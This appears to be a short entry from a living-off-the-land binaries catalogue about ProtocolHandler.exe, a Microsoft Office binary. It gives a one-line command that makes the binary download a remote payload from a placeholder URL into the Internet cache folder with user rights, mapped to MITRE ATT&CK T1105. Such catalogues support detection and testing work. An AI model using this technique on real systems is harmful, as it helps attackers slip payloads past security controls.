.. / ProtocolHandler.exe
Star

Microsoft Office binary


Paths:

Acknowledgements:

Detection:

Download

Downloads payload from remote server 
ProtocolHandler.exe https://example.com/payload
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1105